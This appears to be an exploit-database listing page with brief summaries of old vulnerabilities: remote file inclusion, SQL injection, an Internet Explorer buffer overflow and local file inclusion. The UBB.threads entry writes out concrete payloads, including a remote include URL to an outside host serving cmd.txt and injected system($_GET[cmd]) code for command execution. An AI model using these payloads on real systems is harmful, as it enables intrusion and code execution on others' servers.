header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities

Forum82 version v2.5.2b is vulnerable to multiple Remote File Inclusion (RFI) vulnerabilities. An attacker can exploit this vulnerability by sending a malicious URL in the repertorylevel parameter of the vulnerable script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC

This exploit is a proof-of-concept for a buffer overflow vulnerability in Microsoft Internet Explorer WebViewFolderIcon setSlice() function. The exploit code is written in Perl and uses ActiveXObject to execute arbitrary code on the target system.

UBB.threads Multiple input validation error

UBB.threads Multiple vulnerabilities exploit should allow you to execute commands. Tested on Version 6 (6.5.1.1) and other versions maybe affected. Remote File including ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir and ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir. Files overwrite vulnerabilities if magic_qoutes_gpc = off. Admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/theme.inc.php?cmd=ls -la or admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/config.inc.php?cmd=ls -la. If magic_qoutes_gpc = on admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt? and you will have a command execution files. Exploit: php '.$argv[0].' host Example: php '.$argv[0].' http://localhost/

PHP Krazy Image Host Script (id) Remote SQL Injection Exploit

This exploit allows an attacker to inject arbitrary SQL commands into a vulnerable web application. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'display.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable web application.

lesvisit (visiteurs) <= v2.0 (lvc_include_dir) Remote File Include Vulnerability

A vulnerability exists in lesvisit (visiteurs) version 2.0, which allows a remote attacker to include arbitrary files from remote locations. This is due to a lack of sanitization of user-supplied input to the 'lvc_include_dir' parameter in the '/include/config.inc.php' script.

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)

This exploit is a buffer overflow vulnerability in Microsoft Internet Explorer WebViewFolderIcon ActiveX control. It allows remote attackers to execute arbitrary code via a long argument to the setSlice method.

KGB 1.8+ <= 1.8 full (Local Inclusion) Remote Code Execution Exploit

KGB 1.8+ is vulnerable to a Local File Inclusion vulnerability which allows an attacker to execute arbitrary code on the vulnerable server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'kgb.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable script. This can allow the attacker to include and execute arbitrary local files on the vulnerable server.

A-Blog v2.0 Remote File Include

A-Blog v2.0 is vulnerable to a remote file include vulnerability. This vulnerability exists in the /navigation/links.php, /navigation/search.php, /navigation/donation.php, /navigation/latestnews.php, and /sources/myaccount.php files. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the vulnerable parameters. This can allow an attacker to execute arbitrary code on the vulnerable system.

Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in Newswriter SW version 1.42. The vulnerability is due to the include/editfunc.inc.php script not properly sanitizing user-supplied input to the NWCONF_SYSTEM[server_path] parameter. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it in the context of the webserver process.

Recent Exploits: